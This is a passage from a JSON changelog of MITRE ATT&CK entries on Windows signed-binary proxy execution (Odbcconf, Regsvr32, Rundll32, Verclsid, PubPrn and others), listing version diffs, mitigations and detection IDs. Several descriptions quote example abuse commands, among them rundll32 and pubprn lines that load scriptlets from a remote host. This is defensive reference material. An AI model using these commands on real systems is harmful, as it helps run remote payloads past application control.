                            "url": "https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Alexandros Pappas",
                        "Ziv Kaspersky, Cymptom"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:40:01.230000+00:00\", \"old_value\": \"2025-10-24 17:48:38.626000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0158: Detection of Msiexec Abuse for Local, Network, and DLL Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-24 15:01:32.917000+00:00",
                    "modified": "2026-04-15 22:40:01.263000+00:00",
                    "name": "Odbcconf",
                    "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSVR \"C:\\Users\\Public\\file.dll\"&rbrace;</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/008",
                            "external_id": "T1218.008"
                        },
                        {
                            "source_name": "TrendMicro Squiblydoo Aug 2017",
                            "description": "Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/"
                        },
                        {
                            "source_name": "TrendMicro Cobalt Group Nov 2017",
                            "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/"
                        },
                        {
                            "source_name": "LOLBAS Odbcconf",
                            "description": "LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"
                        },
                        {
                            "source_name": "Microsoft odbcconf.exe",
                            "description": "Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.",
                            "url": "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:40:01.263000+00:00\", \"old_value\": \"2025-10-24 17:48:55.622000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0486: Detecting Odbcconf Proxy Execution of Malicious DLLs"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 19:42:16.439000+00:00",
                    "modified": "2026-04-15 22:41:42.115000+00:00",
                    "name": "Regsvcs/Regasm",
                    "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/009",
                            "external_id": "T1218.009"
                        },
                        {
                            "source_name": "LOLBAS Regasm",
                            "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/"
                        },
                        {
                            "source_name": "LOLBAS Regsvcs",
                            "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"
                        },
                        {
                            "source_name": "MSDN Regasm",
                            "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.",
                            "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx"
                        },
                        {
                            "source_name": "MSDN Regsvcs",
                            "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.",
                            "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Casey Smith"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:41:42.115000+00:00\", \"old_value\": \"2025-10-24 17:49:21.181000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0361: Detecting .NET COM Registration Abuse via Regsvcs/Regasm"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 19:52:17.414000+00:00",
                    "modified": "2026-04-15 22:41:58.327000+00:00",
                    "name": "Regsvr32",
                    "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/010",
                            "external_id": "T1218.010"
                        },
                        {
                            "source_name": "FireEye Regsvr32 Targeting Mongolian Gov",
                            "description": "Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html"
                        },
                        {
                            "source_name": "LOLBAS Regsvr32",
                            "description": "LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"
                        },
                        {
                            "source_name": "Microsoft Regsvr32",
                            "description": "Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.",
                            "url": "https://support.microsoft.com/en-us/kb/249873"
                        },
                        {
                            "source_name": "Carbon Black Squiblydoo Apr 2016",
                            "description": "Nolen, R. et al.. (2016, April 28). Threat Advisory: \u201cSquiblydoo\u201d Continues Trend of Attackers Using Native OS Tools to \u201cLive off the Land\u201d. Retrieved April 9, 2018.",
                            "url": "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Casey Smith"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:41:58.327000+00:00\", \"old_value\": \"2025-10-24 17:49:17.377000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.2\"}}}",
                    "previous_version": "2.2",
                    "version_change": "2.2 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1050: Exploit Protection"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0282: Detection Strategy for System Binary Proxy Execution: Regsvr32"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 18:03:46.248000+00:00",
                    "modified": "2026-04-15 22:42:03.135000+00:00",
                    "name": "Rundll32",
                    "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>  This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/011",
                            "external_id": "T1218.011"
                        },
                        {
                            "source_name": "rundll32.exe defense evasion",
                            "description": "Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.",
                            "url": "https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/"
                        },
                        {
                            "source_name": "Attackify Rundll32.exe Obscurity",
                            "description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.",
                            "url": "https://www.attackify.com/blog/rundll32_execution_order/"
                        },
                        {
                            "source_name": "This is Security Command Line Confusion",
                            "description": "B. Ancel. (2014, August 20). Poweliks \u2013 Command Line Confusion. Retrieved March 5, 2018.",
                            "url": "https://www.stormshield.com/news/poweliks-command-line-confusion/"
                        },
                        {
                            "source_name": "Github NoRunDll",
                            "description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.",
                            "url": "https://github.com/gtworek/PSBits/tree/master/NoRunDll"
                        },
                        {
                            "source_name": "lolbas project Ieframe.dll",
                            "description": "lolbas project. (n.d.). Ieframe.dll. Retrieved October 5, 2025.",
                            "url": "https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"
                        },
                        {
                            "source_name": "lolbas project Zipfldr.dll",
                            "description": "lolbas project. (n.d.). Zipfldr.dll. Retrieved October 5, 2025.",
                            "url": "https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"
                        },
                        {
                            "source_name": "Trend Micro CPL",
                            "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.",
                            "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Amir Hossein Vafifar",
                        "Casey Smith",
                        "Gareth Phillips, Seek Ltd.",
                        "James_inthe_box, Me",
                        "Ricardo Dias"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:42:03.135000+00:00\", \"old_value\": \"2025-10-24 17:48:20.567000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.5\"}}}",
                    "previous_version": "2.5",
                    "version_change": "2.5 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1050: Exploit Protection"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0475: Detection Strategy for T1218.011 Rundll32 Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-08-10 13:59:38.443000+00:00",
                    "modified": "2026-04-15 22:42:21.088000+00:00",
                    "name": "Verclsid",
                    "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/012",
                            "external_id": "T1218.012"
                        },
                        {
                            "source_name": "BOHOPS Abusing the COM Registry",
                            "description": "BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.",
                            "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"
                        },
                        {
                            "source_name": "Red Canary Verclsid.exe",
                            "description": "Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.",
                            "url": "https://redcanary.com/blog/verclsid-exe-threat-detection/"
                        },
                        {
                            "source_name": "LOLBAS Verclsid",
                            "description": "LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"
                        },
                        {
                            "source_name": "Nick Tyrer GitHub",
                            "description": "Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.",
                            "url": "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5"
                        },
                        {
                            "source_name": "WinOSBite verclsid.exe",
                            "description": "verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block\u00a0. Retrieved November 17, 2024.",
                            "url": "https://winosbite.com/verclsid-exe/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Rodrigo Garcia, Red Canary"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:42:21.088000+00:00\", \"old_value\": \"2025-10-24 17:49:01.930000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1037: Filter Network Traffic",
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0042: Detection Strategy for T1218.012 Verclsid Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-15 22:42:22.297000+00:00",
                    "name": "System Script Proxy Execution",
                    "description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1216",
                            "external_id": "T1216"
                        },
                        {
                            "source_name": "GitHub Ultimate AppLocker Bypass List",
                            "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.",
                            "url": "https://github.com/api0cradle/UltimateAppLockerByPassList"
                        },
                        {
                            "source_name": "LOLBAS Project",
                            "description": "Oddvar Moe et al. (2022, February).  Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.",
                            "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Praetorian",
                        "Wes Hurd"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:42:22.297000+00:00\", \"old_value\": \"2025-10-24 17:49:37.665000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0466: Detection of Script-Based Proxy Execution via Signed Microsoft Utilities"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-03 16:49:57.788000+00:00",
                    "modified": "2026-04-15 22:42:36.777000+00:00",
                    "name": "PubPrn",
                    "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1216/001",
                            "external_id": "T1216.001"
                        },
                        {
                            "source_name": "pubprn",
